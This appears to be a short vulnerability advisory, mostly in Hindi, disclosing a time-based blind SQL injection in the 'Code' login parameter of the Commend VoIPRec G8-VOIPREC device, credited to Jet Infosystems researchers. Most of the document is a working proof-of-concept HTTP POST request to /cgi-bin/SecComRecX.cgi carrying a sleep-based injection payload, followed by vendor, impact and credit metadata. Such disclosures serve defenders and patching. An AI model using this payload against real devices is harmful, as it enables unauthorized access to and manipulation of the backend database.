
Commend VoIPRec G8-VOIPREC डिवाइस में टाइम-आधारित ब्लाइंड SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो डेटाबेस हेरफेर के लिए कमजोर Code पैरामीटर को लक्षित करता है।
G8-VOIPREC (Commend VoIPRec) वेब इंटरफ़ेस लॉगिन पेज के "Code" पैरामीटर में समय-आधारित ब्लाइंड SQL इंजेक्शन के लिए संवेदनशील है।
PoC:
POST /cgi-bin/SecComRecX.cgi HTTP/1.1 Host: 192.168.88.10 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://192.168.88.10 Connection: close Referer: http://192.168.88.10/ComRecX/comrecxapp.html
Action=request&Code=userpasswordasdasd'%2b(select*from(select(sleep(6)))a)%2b'
SQL Injection
Commend International
G8-VOIPREC
दूरस्थ
true
दूरस्थ उपयोगकर्ता बैकएंड डेटाबेस में हेरफेर करने के लिए दुर्भावनापूर्ण SQL कोड का उपयोग कर सकता है ताकि वह उस जानकारी तक पहुंच सके जो प्रदर्शित करने के लिए अभिप्रेत नहीं थी।
Alexander Starikov (Jet Infosystems, jet.su), Ivashchenko Sergey (Jet Infosystems, jet.su)